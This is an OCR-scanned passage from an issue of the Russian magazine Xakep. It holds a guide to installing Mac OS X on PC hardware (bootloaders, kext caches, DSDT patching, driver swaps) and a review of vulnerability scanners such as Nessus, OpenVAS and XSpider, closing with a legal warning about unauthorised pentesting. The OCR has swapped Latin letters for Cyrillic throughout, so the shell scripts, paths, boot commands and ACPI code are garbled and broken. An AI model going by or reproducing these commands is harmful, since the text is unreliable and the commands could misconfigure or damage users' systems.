разделами: Рагііііоп Мадіс, Рагадоп Рагііііоп 
Мападег, Асгопіз. Существует и бесплатный, 
хорошо работающий способ: загрузиться с 
ІЛэипІи ЫѵеСБ, но не запускать инсталляцию 
Линукса, а набрать в терминале команду 
зийо драгДесі, пароль вводить не нужно. 
Программа драгСес! поможет совершенно 
корректно, без потерь данных, изменить раз- 
меры разделов и их расположение, создать 
новый раздел и отформатировать его. Итак, 
хороший вариант разбивки на разделы: 

1. ѴѴіпсіоѵѵзНО, первичный, активный раздел, 
ІЧТЕ5. 

2. БпоѵѵНО, первичный, пока ЕАТ32. 

3. Расширенный раздел, где можно органи- 
зовать логические разделы, если необходи- 
мо. 

Теперь вставляем нашу загрузочную систему 
либо сразу сборку и грузимся с нее. На экра- 
не появляется сообщение про Багѵѵіп Ьооі и 
приглашение нажать <Е8>. Это стоит сделать 
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для диагностики. В появившейся командной 
строке набираем -ѵ, что означает «ѴегЬозе 
Ьооі» — до загрузки графической оболочки 
мы будем видеть на экране пошаговый про- 
цесс загрузки системы. Хорошо, поскольку 
в случае неудачи ты будешь знать, на чем 
все дело остановилось. К примеру, одна из 
известнейших ошибок «Ш ѵѵаібпд бог гооі: 
беѵісе...» означает, что в загрузочной систе- 
ме отсутствует драйвер контроллера 0Ѵ0- 
накопителя. Один из вариантов — присоеди- 
нить ОѴО-накопитель через БЭБ-интерфейс, 
таким способом устанавливали Тигра на 
всевозможные конфигурации. Либо искать 
другую загрузочную систему :(. 

После пробега белых букв по черному экрану 
он, наконец, очистился, побелел, посинел, 
и перед нами приглашение на установку 
МасОЗХ, с его лицензионным соглашением. 
Не торопись! Сверху есть меню с утилитами, 
там следует выбрать Оізк ІЛіІіТу, и с помощью 
него произвести форматирование выбран- 
ного раздела в формат Мае 05 ЕхТепбесІ 
(ригпаіесі). После завершения 0 ізк Обі Іібу мы 
возвращаемся в инсталлятор, указываем, 
куда ставить систему, выбираем опции уста- 
новки — и в добрый путь! Заметим, что сбор- 
ки содержат очень много опций, в том числе 
модифицированные ядра, БИОСы, драйвера 
для всевозможных встроенных устройств, 
«очень полезные» или даже «необходимые» 
драйвера, а также набор утилит. Все это 
задумано не зря и не во вред пользователю, 
однако, если ты не уверен, что тот или иной 
драйвер подойдет, лучше их не выбирать, 
наверняка в интернете найдешь более 
современный вариант. А вот утилиты взять 
можно, их наличие системе не мешает. В упо- 
мянутой выше сборке от сіа п 1 234 есть еще 
загадочный шаг по изготовлению и установке 
файла 050Т (Оіббегепбіаі Бузует Оезспрбоп 
ТаЫе). Шаг обязательно стоит выполнить, 
если ты не готов сделать его по-другому. 

Ниже мы обсудим, что это и зачем. Словом, 
система установилась успешно, на что ей 
потребовалось 10 минут, и попросила переза- 
грузки... И здесь нас ждет «кернел паника», 
скорее всего, не последняя. Выглядит, как 
таблица цифр и некоторые буквенные иден- 
тификаторы. Иногда из этого можно понять 
причину краха. 

В данном случае система не сформиро- 
вала правильный ткехі (тиШрІе кегпеі 
ехТепзіопз, в первом приближении это архив 
драйверов). Продвинутые хакеры изготавли- 
вают его сами, подставляют в систему, после 
чего она грузится дальше. На вкладке приве- 
ден текст скрипта, который создает ткехЕ 

# ! /Ьіп/ЪазЪ. 

КЕХТ_ЗУЗТЕМ= " /Ѵоіитез /ЗпсжНБ/ 

Зузкет/ЬіЪгагу/Ехкепзіопз " 

КЕХТ_АББ= " /Ѵоіитез /Зпоѵ/НБ/Ехкга/ 

АсісІікіопаІЕхкепзіопз " 

ЗУ 8_МКЕХТ= " /Ѵоіитез /ЗпсжНБ/ Зузкет/ 



ЬіЬгагу/СасЬез/сош. арріе . кехк . 
сасЬ.ез/8кагкир/Ехкепзіопз .ткехк " 
ЕХТКА_МКЕХТ= " /Ѵоіитез /Зпо^НБ/ 
Ехкга/Ехкепзіопз .ткехк " 

кехксаске -ѵ 1 -к -т " $ЕХТКА_ 
МКЕХТ " " $ КЕХТ_АББ " 

кехксасЪе -ѵ 1 -к -ш "$ЗУЗ_МКЕХТ" 

" $КЕХТ_ЗУЗТЕМ М 

Правда, в этом варианте предполагается, что 
ты имеешь установленную систему МасОЗХ 
на другом разделе, с которой можешь загру- 
зиться, и выполнить этот скрипт. Следующий 
вариант тоже требует наличия МасОЗХ, но 
уже необязательно на том же компьютере. 
Суть в том, что, так или иначе, загрузчик, 
установленный по умолчанию, необходи- 
мо менять, а вот с новейшим загрузчиком 
СбатеІеоп-2 ВСЗ паники ядра уже нет, 
система сама создает мкекст. Загрузчик 
создан по лицензии ОрепЗоигсе, потому 
доступен в интернете. Надо заметить, есть 
его хорошие модификации, к примеру, РС-ЕН 
10.3 — 10.5 Ьу ІМеіказ. В архиве содержится 
много файлов, в данный момент интересны 
три из НИХ: 

ЬоокО — должен быть записан в нулевой 
сектор диска. Это — главная загрузочная 
запись. 

ЬоокІЬ. — должен быть записан в нулевой 
сектор раздела. 

Ъоок — должен быть расположен в корне- 
вой директории раздела с системой. 

Сделать это можно в любой операцион- 
ной системе, к примеру, так это делается в 
МасОЗХ: 

зисіо ксіізк -к /ктр/ЬоокО -и -у / 
сІеѵ/гсІізкО 

сМ ік=/ктр/Ьоок1Ъ. ок=/с!еѵ/гс1ізк0з2 
зисіо ср /ктр/Ьоок /Ѵоіитез /ЗпоѵДгГО/ 

Один из вариантов, как можно сделать: 

1. Записать файлы на флешку. 

2 . Загрузиться с инсталляционного диска, как 
мы это уже проделывали, выбрать из меню 
«терминал». 

3. Смонтировать флешку командой 
/зЫп/тоипк -о позиісі -ѵг -т 755 / 
сіеѵ/сіізкізі /ктр 

4 . Установить загрузчик указанными выше 
командами. 

5 . Для загрузчика СЬатеІеоп-2 также необ- 
ходима папка /ЕхТга в корне раздела, где 
находятся файлы сот. арріе . Воок .ріізк 
и зтЫоз. ріізк. Первый содержит флаги 
загрузки: ТітеоіТ в 1 5 секунд дает тебе воз- 
можность сообразить, не хочешь ли ты загру- 
зить другую систему или с другими флагами; 
5у5бет-ісІ должен быть уникален, для этого 
существует ІЛЛОСепегаІюг. 

В файле зтЬіоз. ріізк самый интересный 
пункт — ЗМРгосІисШате. Как выяснилось, 
от того, как ты назовешь свой компьютер, он 
и работать будет по-разному. Тема, опять- 







АВОТИСПИСОКНЕЭППЛОВСКИХ 

УСТРОЙСТВ 



таки, очень емкая, но для указанного выше 
десктопа оптимальным выбором является 
МасРгоЗ.І. С новым загрузчиком мы снова 
можем попытаться загрузиться в систему. 

В некоторых конфигурациях это удается, в 
других будет новая «кернел-паника», на этот 
раз с указанием на ЮАТАРатіІу . кехк, 
т.е. драйвер АТА-контроллера. Проблема уже 
изучена, лечится подменой родного кекста 
патченным, взятым из интернета. Еще, если 
у тебя клавиатура Р52, к ней и драйвер пона- 
добится новый, например, ѴоосіооР32 .кехк: 

тксііг /Ѵоіитез /ЗпомНБ/Ок к 

зисіо тѵ -ѵ /ѴоІитез/ЗпоѵЩГО/ Зузкет/ 

ЬіЬгагу/Ехкепзіопз/ІОАТАЕатіІу . 

кехк /Ѵоіитез /ЗпомНБ/Ок к 

зисіо ср -г -ѵ /ктр/ІОАТАЕатіІу . 

кехк /Ѵоіитез /ЗпоѵДГО/ Зузкет/ 

ЬіЬгагу/Ехкепзіопз 

зисіо ср -г -ѵ /ктр/ 

ІОАрр1еАСРІР32ЫиЬе . кехк /Ѵоіитез/ 

ЗпотлДГО/ Зузкет/ ЬіЬгагу/Ехкепзіопз 

зисіо ср -г -ѵ / ктр /ѴоосіооР32 . кехк 

/Ѵоіитез /ЗпоѵДШ/Зузкет/ЬіЬгагу/ 

Ехкепзіопз 

В дальнейшем можно будет вернуться к род- 
ному кексту, исправив БЗОТ. Подменить одни 
файлы другими проще всего из ѴѴіпсІоѵѵз, 
только там нужно установить программу 
МасБгіѵе, позволяющую писать в раздел, 
отформатированный в НЕ5+. Доступна 
30-дневная рабочая версия, для этих целей 
вполне достаточно. 

Загружаемся в новую систему с ключами 
загрузки -ѵ -к агс1і=і386. Пояснения: 

-ѵ — мы должны видеть в текстовом виде, 
что происходит. 

-к — обновить кеш драйверов. 
агск=і386 — для начала выбираем режим 
32 бита, переход на 64 бита сделаем, когда 
будем готовы к этому шагу. 

Наконец-то! Экран приветствия, настройки 
нового пользователя, регистрация (не надо 
сообщать в Эппл свои данные, так что отклю- 
чи интернет). Ты в системе. 

ДАЛЬНЕЙШАЯ АДАПТАЦИЯ СИСТЕМЫ 

Описанная выше процедура не всегда быва- 
ет успешной, но даже в тех случаях, когда 
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система все же загружается, чаще всего 
успех еще не полный. Дальнейшие инструк- 
ции помогут разобраться, что нужно сделать, 
если система не работает или работает 
неполноценно. 

В первую очередь необходимо разобраться 
с ОЗОТ — небольшой программой (—20 кб], 
работающей ВНЕ операционной систе- 
мы. Подсистема АСРІ (АбѵапсесІ СотріЛег 
Роѵѵегтападетепі; I пііегбасе] закладывает- 
ся производителем материнской платы в 
БИОСе. Проблема в том, что МасОЗХ ориен- 
тирована на использование АСРІ, а произ- 
водители РС не предусмотрели, что на таком 
компьютере будет установлена ХакОС. Вот, к 
примеру, отрывок из этой программы: 

ІЕ (_ 08 і ( "Ьігшх" ) ) 

{ ЗЕоге (0x03, ОЗѴЕ) } 

Еізе 

{ 

ІЕ (_ОЗІ ( "Міпскжз 2001")) 

{ ЗЕоге (0x04, ОЗѴЕ) } 

Еізе 

{ 

ІЕ (_ОЗІ ("Мпскжз 2 0 01.1")) 

{ 

ЗЕоге (0x05, ОЗѴЕ) 

} 

Еізе 

{ 

ІЕ (_ОЗІ ( " РгееВЗБ" ) ) 

{ 

ЗЕоге (0x06, ОЗѴЕ) 

} 

Еізе 

{ 

ІЕ (_ОЗІ ("НР-БХ" )) 

{ 

ЗЕоге (0x07, ОЗѴЕ) 

} 

Еізе 

{ 

ІЕ (_ОЗІ ( " ОрепѴМЗ " ) ) 

{ 



ЗЕоге (0x08, ОЗѴЕ) 

} 

} 

} 

} 

} 

В этом списке наблюдается даже такая 
экзотика, как ОрепѴМЗ, но МасОЗХ здесь 
отсутствует, и поведение программы про- 
сто не определено. Наиболее общий совет 
— сделать так, будто мы работаем в системе 
ѴѴіпбоѵѵз ХР 5РЗ. 

ІЕ (_ОЗІ ( "Багміп" ) ) 

{ 

ЗЕоге (0x05, ОЗѴЕ) 

} 

Да! Наша система идентифицируется АСРІ 
как Оагѵѵіп. 

Вернемся к тому, откуда этот текст, как его 
получить и использовать. Как видишь, это 
программа, написанная на языке, сходном с 
С. БИОС, при старте компьютера, генерирует 
сізсіе.аті, который исполняется где-то в 
фоновом режиме вне операционной системы. 
Эту программу можно сохранить в бинар- 
ном виде в файле в любой ОС, в том числе 
в ѴѴіпбоѵѵз. Для этого существует ОБйТ 61)1 
раІсЬег к>г ѴѴіпсІоѵѵз. Если у тебя уже есть 
МасОЗХ, можно проделать эту операцию и 
в нем. Для этого необходимо создать такой 
скрипт: 

# ! /Ып/ЬазЬ 

ссЗіг= ' сЗігпаше $0' 
сЕпрсІі г = аср і ЕЫ з 

# СгеаЕе а сішгѵр сіігесЕогу 

ІЕ [ [ ! -<3 $с!трс1іг ] ] ; ЕЬеп 

тксііг $<5трс1іг 
Еі 

# Битр АСРІ ЕаЫе сІаЕа Егот іогед 



асрі_ЕЫз = 'іогед -1ѵ\Ю I дгер "АСРІ 
ТаЫез" I сиЕ -Е2 -сЗ"{* I Ег " , " 

есію -е " ХпБитріпд ЕЬе 
Еоііоміпд АСРІ ЕаЫез Ео Еоісіег 
ч рѵѵсі х /$сЗтрс!іг\п" 

# Ьоор ЕЬгоидЬ еаск ЕаЫе 
Еог ЕЫ іп $асрі_ЕЫз 
сіо 

ЕЫ_пате= 'есЬо $ЕЫ I 
сиЕ -ЕІ -сі" = " | Ег -й 

есію $ЕЫ_пате 

ЕЫ_сіаЕа='есЕю $ЕЫ I 

сиЕ -Е2 — сі " < " | Ег -сі ">" ' 

есЕю $ЕЫ_сіаЕа I ххсі -г -р > 
$сішр(ііг/$ЕЫ_пате . аті 
$сс!іг/іаз1 -сі $сЗтрсііг/ 
$ЕЫ_пате.аш1 1> 

/сіеѵ/пиіі 2>&1 

сіопе 

есЕіо -е " ЕпБопе!" 

Вызываем программу Тегтіпаі. Создаем 
папку ОЗОТ: 

тксііг БЗБТ 
С(І БЗБТ 

Помещаем туда этот скрипт, назовем его 
сіишрАСРі . зЬ. Помещаем в эту же папку ути- 
литу ІА5І_ (версию для Мае находим в интер- 
нете или на диске к журналу]. И запускаем 
скрипт на исполнение: 

. /сіишрАСРі . зЕі 

У нас появляется вложенная папка 
асріЕЫз, внутри которой несколько фай- 
лов — АСРІ-таблиц, среди которых и файлы 
сізсіЕ . аті и сізсіЕ.сізІ. Последний пред- 
ставляет собой программу в текстовом виде, 
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КАКВИДИШЬ.ВСИСТЕМЕ ИС- 
ПОЛЬЗУЕТСЯ МЫШЬ ОТ КѴЕ 
5Ѵ5ТЕМД.Е. ОБЫЧНАЯ 6ЕЫШ5. 
ДЛЯ РАБОТЫ МОЖНО ОБОЙТИСЬ 
БЕЗ СПЕЦИАЛЬНОЙ ЭППЛОВСКОЙ 
МЫШКИ 



тогда как аті — в бинарном виде. Взаимное 
превращение одного в другое осуществляет- 
ся компилятором іазі. 

іазі -Да сізсід.сіві 
іазі -<3. сізсід . аті 

Файл сізі можно редактировать обычным 
текстовым редактором (но не виндусовыми 
ІЧоІерасІ, ѴѴогбраб, они создают другой конец 
строки, и текст будет капитально испорчен!), 
чтобы исправить алгоритм программы. 
Исправленный файл откомпилировать (іазі 
-Да сізсід . сізі), и отправить в корень диска: 

зисіо ср -ѵ сізсід . аті / 

После перезагрузки системы изменения всту- 
пят в силу. 

Файл 050Т всегда индивидуален, чужой 
взять нельзя. Тот, что создан БИОСом, не 
рассчитан на работу с ХакОС, и даже не 
только в смысле идентификации системы, но 
и потому, что для МасОЗХ требуется больше 
информации об устройствах и иное распре- 
деление прерываний. Все вместе — большая 
и достаточно сложная тема, в интернете 
выложены многостраничные инструкции в 
каких случаях и что нужно менять в этом 
файле. Краткий перечень: 

• Отменить прерывания таймеров НРЕТ, РТС, 
ТМР и добавить ІР02 для ІРІС. Много про- 
блем решается именно здесь. 

• Инициализировать ЮЕ Іітіпд гедізіегз. 
Теперь можно использовать родной 
ІОАТАЕатіІу . кехД. 

• Прописать свойства звуковой карточки, 
сетевой и видео, чтобы заработали драйвера 
для них. 

• Прописать устройства, которые не были 
предусмотрены в БИОС. 

• Скорректировать события засыпания/про- 
буждения — тема актуальна для владельца ев 
ноутбуков. 

• Описать методы и свойства процессора. 
Таким способом удается заставить работать 



управление питанием и частотой процессора 
(Іпіеі БреесІБіер). В простое процессор рабо- 
тает на низкой частоте, при нагрузке — на 
максимальной, тем самым гораздо меньше 
нагревается. Опять таки, очень актуально для 
ноутбуков. 

• Шина 115В будет работать либо со специ- 
альной версией драйвера, либо с 05БТ- 
патчем на все порты 05В. 

Ну и, напоследок, приведем список необхо- 
димых драйверов, которые следует поставить 
в систему: 

ІОРСІЕатіІу . кехД — родная версия 
почему-то не соответствует стандартным РС. 
ОрепНаІДКезДагД . кехД — без него систе- 
ма не выключается и не перезагружается. 
ЫаДіД.кехД — для включения видеокарт 
(разные вариации, возможна замена на Б5ВТ 
раДсЬ). 

Арр1еАСРІР32ЫиЪ.кех* + 
Арр1еР32СопДго11ег . кехД (гебиіісіесі) или 
ѴоосіооР32 . кехД — если у тебя клавиатура, 
мышь или трекпад подключены как Р52. 
АррІеАСРІВаДДегуМападег . кехД — для 
показа батарейки на ноутбуках. 

Еакезтс . кехД — сообщает системе необ- 
ходимую приватную информацию, сізппоз.кехі 
можно удалить. 

ѴоосіооНОА . кехД —драйвер, подходящий 
для большинства звуковых карт стандарта 
Нідб БеЕпШоп Аибіо. При этом АррІеНБА.кехІ 
обязательно следует удалить. 

Установка любого драйвера осуществляется 
из терминала командой 

зисіо ср -г -ѵ /Дтр/ЫеѵтОгіѵег . кехД 
/ЗузДет/ЬіЬгагу/ЕхДепзіопз/ 

Внимание! Копирование кекста с помощью 
мыши не приводит к его корректной инстал- 
ляции, такой файл будет иметь неправильные 
права и не примется системой. 

ИДЕНТИФИКАЦИЯ УСТРОЙСТВ 

Каждое РСІ-устройство имеет иденти- 
фикаторы ОеѵісеІВ и ѴепсІогЮ, каждое 
ЕІ5В-устройство — ісі РгосІ исі и ібѴепсІог, 
каждое АСРІ-устройство — имя типа 
РІЧРхххх или АСРІхххх. Во многих случа- 
ях патч родных драйверов заключается 
в подмене идентификаторов родных на 
свои. К примеру, установлен ѴѴіЕі Абаріег 
Вгоабсот 4315. Открываем в виндоусе 
«Диспетчер Устройств», находим его и 
смотрим сведения, совместимые коды обо- 
рудования. Узнаем, что ВеѵісеІО=4315 и 
Ѵепс1ог:го=14е4. 

Затем смотрим в системную папку и находим 
похожий драйвер для Вгоабсот 431 1 , изуча- 
ем его іпДо.рІізД: 

зисіо папо /ЗузДет/ЫЬгагу/ 
ЕхДепзіопз/Ю80211Раті1у . 
кехД /СопДепД з /Ріидіпз / 
Арр1еАігРогДВгст43 11 . кехД/ 
СопДепДз/ІпДо .рІізД 

И ВОТ ЧТО в нем: 




<аггау> 

<зДгіпд>рсі106Ь, 4е</зДгіпд> 
<зДгіпд>рсі14е4 , 4311</зДгіпд> 
<зДгіпд>рсі14е4 , 4312</зДгіпд> 
<зДгіпд>рсі14е4 , 4313</зДгіпд> 
<зДгіпд>рсі14е4 , 4318</зДгіпд> 
<зДгіпд>рсі14е4 , 4319</зДгіпд> 
<зДгіпд>рсі14е4 , 431а</зДгіпд> 
<зДгіпд>рсі14е4 , 432 0</зДгіпд> 
<зДгіпд>рсі14е4 , 4324</зДгіпд> 
<зДгіпд>рсі14е4 , 4325</зДгіпд> 

Таким образом, драйвер рассчитан на разные 
варианты адаптеров, но не на 4315. А что, 
если вручную его туда прописать по образцу? 
Да! 

И это очень часто работает. В частности, в 
рассматриваемом варианте такая подста- 
новка приводит к полноценно работающему 
драйверу. 

ОБНОВЛЕНИЕ СИСТЕМЫ 

Выполняя обновление системы, непо- 
средственно через Зоііѵѵаге Іірбаіе... 
или просто загрузив СотЬо Еірбаіе с 
официального сайта Арріе, важно пом- 
нить, что именно ты менял в системе, 
чтобы после апдейта «привести ее в 
чувство». В частности, в вышеприведен- 
ном примере с ѴѴіЕі после апдейта цифру 
4315 придется вводить заново. Если ты 
используешь УообооНБА, предваритель- 
но удалив АррІеНБА, то после апдейта 
он появится вновь, и конфликт приведет 
к краху системы. Чтобы этого избежать, 
перед обновлением следует переместить 
ѴообооНБА в безопасное место, а после 
успешного обновления вновь его устано- 
вить. Аналогичные рекомендации будут 
и относительно других родных кекстов, 
которые ты по той или иной причине 
удалил. Существует вариант оізаЫег. 
кехД, который позволяет не удалять род- 
ные кексты, а просто отменить их загруз- 
ку, в этом варианте обновлению вообще 
ничего не мешает. 

ПЕРЕХОД НА НАСТОЯЩИЙ МАС 

Устанавливая таким образом Мас05 X, теря- 
ешь одну из главных фишек системы — 
чрезвычайную продуманность, всецело 
избавляющую пользователя от головной 
боли по поводу чего-либо. Однако гиков 
такими проблемами не испугать. В прин- 
ципе, с тем же успехом можно было взять 
готовую сборку ХакОС и получить систему за 
15 минут. Поэтому наша цель была глубже, и 
теперь мы не только знаем, каким образом 
устанавливается Мас05Х на обычный ком- 
пьютер, но и каким образом может на нем 
работать. Впрочем, привыкнув к системе, 
очень скоро понимаешь, что надо покупать 
оригинальный Мае и не идти ни на какие 
компромиссы :). ЦЦ 



ХАКЕР 01 /133/ 10 



► 025 







Ыеззиз 

ѵѵѵѵѵѵ.пеззиз.ога/ріиаіпз/ 

іпсіех.рЬр 

Ргее/ьЬагеѵѵаге 

ѴѴІп/піх/Мас 

Если кто-то и не пробовал Ыеззиз, то, по 
меньшей мере, слышал о нем. Один из самых 
известных сканеров безопасности имеет 
богатую историю: будучи когда-то открытым 
проектом, программа перестала распростра- 
няться в открытых исходниках. К счастью, 
осталась бесплатная версия, которая изна- 
чально была сильно обделена в доступе к 
обновлениям для базы уязвимостей и новым 
плагинам, но позже разработчики сжалились 
и лишь ограничили ее в периодичности 
апдейтов. Плагины — ключевая особенность 
архитектуры приложения: любой тест на про- 
никновение не зашивается наглухо внутрь 
программы, а оформляется в виде подклю- 
чаемого плагина. Аддоны распределяются на 
42 различных типа: чтобы провести пентест, 
можно активировать как отдельные плагины, 
так и все плагины определенного типа — 
например, для выполнения всех локальных 
проверок на ІІЬипІи-системе. Причем никто 
не ограничивает тебя в написании собствен- 
ных тестов на проникновения: для этого в 
Ыеззиз был реализован специальный скрип- 
товый язык — ЫА5І_ (Ыеззиз Аиаск Бсгірбпд 
І_апдиаде], который позже позаимствовали и 
другие утилиты. 

Еще большей гибкости разработчики доби- 
лись, отделив серверную часть сканера, 
выполняющего все действия, от клиентской 
программы, представляющей собой не более 
чем графический интерфейс. В последней 
4.2 версии демон на 8834 порту открывает 
веб-сервер; с ним можно управлять сканером 




через удобный интерфейс на Еіазб’е, имея 
один лишь браузер. После установки скане- 
ра серверная запускается автоматически, 
как только укажешь ключ для активации: 
ты бесплатно можешь запросить его на 
домашнем сайте Ыеззиз. Правда, для входа, 
и локального, и удаленного, понадобится 
предварительно создать пользователя: в 
винде это делается в два клика мыши через 
6111-админку Ыезиз Зегѵег Мападег, с ее же 
помощью можно запускать и останавливать 
сервер. 

Любой тест на проникновение начинается с 
создания так называемых Роіісіез — правил, 
которых сканер будет придерживаться во 
время сканирования. Здесь-то и выбираются 
виды сканирования портов (ТОР Зсап, ПОР 
Зсап, 5уп Зсап и т.д.) , количество одно- 
временных подключений, а также типичные 
чисто для Ыеззиз опции, как, например, 

Заію Сбескз. Последняя включает безопас- 
ное сканирование, деактивируя плагины, 
которые могут нанести вред сканируемой 
системе. Важный шаг в создании правил — 
это подключение нужных плагинов: можно 
активизировать целые группы, скажем, 
ОеІаиЛ ІІпіх Ассоипіз, 0Ы5, СІ5С0, Зіаскѵѵаге 
босаі Зесигііу Сбескз, ѴѴіпсІоѵѵз и т.д. Выбор 
возможных атак и проверок — огромный! 




0РЕІМѴА5 — 

Отличительная черта Ыеззиз — умные 
плагины. Сканер никогда не будет скани- 
ровать сервис только по номеру его порта. 
Переместив веб-сервер со стандартного 
80-го порта, скажем, на 1234-й, обмануть 
Ыеззиз не удастся — он это определит. 

Если на ЕТР-сервере отключен анонимный 
пользователь, а часть плагинов использу- 
ют его для проверки, то сканер не будет их 
запускать, заведомо зная, что толку от них не 
будет. Если плагин эксплуатирует уязвимость 
в РозШх’е, Ыеззиз не будет пытать счастья, 
пробуя тесты против зепсІтаіГа — и т.д. 
Понятно, что для выполнения проверок на 
локальной системе, необходимо предоста- 
вить сканеру Сгебепбаіз (логины и пароли 
для доступа] — это завершающая часть 
настройки правил. 

ОрепѴАБ <_ 

ѵѵѵѵѵѵ.орепѵаз.огд 

Ргееѵѵаге 

ѴѴІп/піх/Мас 

Несмотря на то, что исходные коды Ыеззиз 
стали закрытыми, движок Ыеззиз 2 и часть 
плагинов по-прежнему распространяются 
по лицензии 6Рб в виде проекта ОрепѴАБ 
(ОрепЗоигсе ѴиІпегаЬіІііу Аззеззтепі; 
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ОТЧЕТ О СКАНИРОВАНИИ ХОСТА В 
Х5РШЕВ 



Бсаппег]. Сейчас проект развивается совер- 
шенно независимо от своего старшего 
брата и делает немалые успехи: последняя 
стабильная версия вышла как раз перед 
отправкой номера в печать. Неудивительно, 
что ОрепѴАЗ так же использует клиент- 
серверную архитектуру, где все операции 
сканирования выполняются серверной 
частью — она работает только под никсами. 
Для запуска потребуется закачать пакеты 
орепѵаз-зсаппег, а также набор библиотек 
орепѵаз-іібгагіез. В качестве клиентской 
части для ОрепѴАЗ 3.0 доступна только 
никсовая СІЛ-программа, но, думаю, что, 
как у предыдущих версий, скоро появится 
порт для винды. В любом случае, проще 
всего воспользоваться ОрепѴАЗ при помо- 
щи небезызвестного ЫѵеСО Васіхаск (4-ая 
версия], в котором он уже установлен. Все 
основные операции для начала работы 
вынесены в пункты меню: ОрепѴАЗ Маке 
Сегі (создание 55І_-сертификата для доступа 
к серверу], АсМ ІІзег (создание юзера для 
доступа к серверу], ІЧѴТ Зупс (обновление 
плагинов и баз уязвимостей], и, в конце кон- 
цов, ОрепѴАЗ Зегѵег (запуск сервера через 
пункт меню]. Далее остается только запу- 
стить клиентскую часть и выполнить под- 
ключение к серверу для начала пентеста. 
Открытость и расширяемость ОрепѴАЗ позво- 
лила сильно прокачать программу. Помимо 
непосредственно плагинов для анализа 
защищенности, в нее интегрировано немало 
известных утилит: 1\Шо для поиска уязвимых 
СОІ-сценариев, птардля сканирования пор- 
тов и моря других вещей, іке-зсап для обна- 
ружения ІРЗЕС ѴРІЧ узлов, атар для иден- 
тификации сервисов на портах, используя 



СКАНЕР ОТ ИЗВЕСТНОЙ 5ЕСІІРІТѴ- 
КОМПАНИИ ЕЕУЕ 




■ріпдегр гіп'Ыпд, оѵаісіі для поддержки ОѴАІ_ — 
стандартного языка для описания уязвимо- 
стей — и множество других. 

І-Х5рі(Іег 7 

ѵѵѵѵѵѵ.різесигііу.ги/ 

хз7сІоѵѵпІоасІ.а5р 

ЗЬагеѵѵаге 

ѴѴІп 

Первые строчки кода ХЗрісІег были напи- 
саны 2 декабря 1998 года, а за прошедшие 
с тех пор 12 лет этот сканер стал известен 
каждому российскому специалисту по инфор- 
мационной безопасности. Вообще, Розібѵе 
Тесбпоіодіез — одна из немногих компаний 
на отечественном рынке информацион- 
ной безопасности, чьи сотрудники умеют 
реально что-то ломать, а не только красиво 
продавать услуги. Продукт был написан не 
программистами, а специалистами по ИБ, 
знающими, как и что надо проверять. Что в 
итоге? Имеем очень качественный продукт с 
одним лишь, но весьма серьезным для нас 
минусом: ХЗрісІег платный! Задаром разра- 
ботчики предлагают урезанную демо-версию, 
в которой не реализован целый ряд проверок, 
в том числе эвристических, а также онлайн- 
обновления для базы уязвимостей. Более 
того, силы разработчиков сейчас всецело 
направлены на другой продукт — систему 
мониторинга информационной безопасно- 
сти МахРаІгоІ, для которой, увы, нет даже и 
демки. 

Но даже при всех ограничениях ХЗрісІег 
является одним из самых удобных и эффек- 
тивных инструментов анализа безопасности 
сети и конкретных узлов. Настройки скани- 
рования, как и в случае ІЧеззиз, оформля- 
ются в виде специального набора правил, 
только в данном случае они называются не 
Роіісіез, а профилями. Настраиваются как 
общие параметры для сетевого анализа, 
так и поведение сканера для конкретных 
протоколов: 55Н, ЮАР, НТТР. Тип исследуе- 
мого демона на каждом порту определяется 
не по общепринятой классификации, а с 
использованием эвристических алгорит- 
мов ЕпдегргіпБпд’а — опция включается 
одним кликом в профиле сканирования. 
Отдельного слова заслуживает обработка 
РРС-сервисов (ѴѴіпсІоѵѵз и *піх] с полной 
идентификацией, благодаря которой удается 
определить уязвимости различных сервисов 
и детальную конфигурацию компьютера в 
целом. Проверка слабости парольной защи- 
ты реализует оптимизированный подбор 
паролей практически во всех сервисах, тре- 
бующих аутентификации, помогая выявить 
слабые пароли. Результат сканирования 
оформляется в виде удобного отчета, при- 
чем для каждой найденной потенциальной 
уязвимости выдается крохотное описание 
и внешний линк, куда можно обратиться за 
подробностями. 




РАЗНЫЕ ВИДЫ СКАНИРОВАНИЯ 
6РІ І.АМСІІАРО 



6РІ І_АЫдиагсі ◄ 

ѵѵѵѵѵѵ.дЩсот/ІаппеЩсап 

Ргееѵѵаге/БЬагеѵѵаге 

ѴѴІп 

Я особенно люблю этот продукт — за набор 
предустановленных профилей для сканирова- 
ния. Помимо полного сканирования удален- 
ной системы, подразумевающего все виды 
доступных проверок (кстати, есть специальная 
версия для медленного коннекта — напри- 
мер, для тормозного ѴРІ\І-соединения через 
Штаты), есть масса отдельных групп проверок. 
Например, можно быстро проверить десят- 
ки хостов на наличие уязвимостей из Тор20, 
составленной известной зесигку-корпорацией 
5АІМ5. Тут же можно активировать и поиск 
машин с неустановленными патчами или 
сервис-паками, выбрать профиль для пентеста 
веб-приложений и т.д. Причем, кроме профи- 
лей, непосредственно направленных на поиск 
уязвимостей, есть и ряд средств для аудита: 
поиск шар, умный сканер портов, в том числе 
для поиска открытых малварью соединений, 
определение конфигурации компьютера и т.д. 
Получается, в одном продукте уживаются масса 
полезных утилит. Постоянно обновляемая база 
уязвимостей ОН БАЫдиагсІ включает более 
15000 записей, позволяя сканировать самые 
разные системы (ѴѴіпсІоѵѵз, Мае 05, І_іпих], в 
том числе, установленные на виртуальных 
машинах. Сканер автоматически подтягивает 
обновления для базы, которые в свою очередь 
формируются по отчетам ВидТгад, 5АІМ5 и дру- 
гих компаний. Реализовать свои собственные 
проверки, как водится, можешь и ты сам. Для 
этого предоставляется специальный скрип- 
товый язык, совместимый с РуШоп и ѴВЗсгірІ: 
(какова связка!], а для полного удобства еще и 
удобный редактор с дебагером — получается 
настоящая ЮЕ. Еще одна уникальная фишка 
ЕАІЧдиагсГа — возможность определения того, 
что машина запущена в виртуальном окруже- 
нии (пока поддерживается ѴМѵѵаге и Ѵігіиаі 
РС] — это одна из уникальных фишек сканера. 



Веііпа Ыеіѵѵогк ЗесигИу 
Зсаппег 

ѵѵѵѵѵѵ.ееуе.сот 

ЗЬагеѵѵаге 

ѴѴІп 

Главное разочарование этого легендарного 
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РС_20ЫЕ 



2007 Сіоппесіі 



ІігЛШньІМі 



ІІШМШІІЯІІ 



0ТЧЕТМВ5А, ПЕРЕНЕСЕННЫЙ НА СХЕМУ ѴІ5І0 




> ѵѵагпіпд 

Пентестсерверов 
и ресурсов без воли их 
владельцев — 
деяние уголовно 
наказуемое. В случае 
использования по- 
лученных знаний 
в незаконных целях 
автор и редакция 
ответственности не 
несут. 




> сЫ 



Большую часть пред- 
ставленных в обзоре 
утилитты найдешь на 
нашем РУР-диске. 



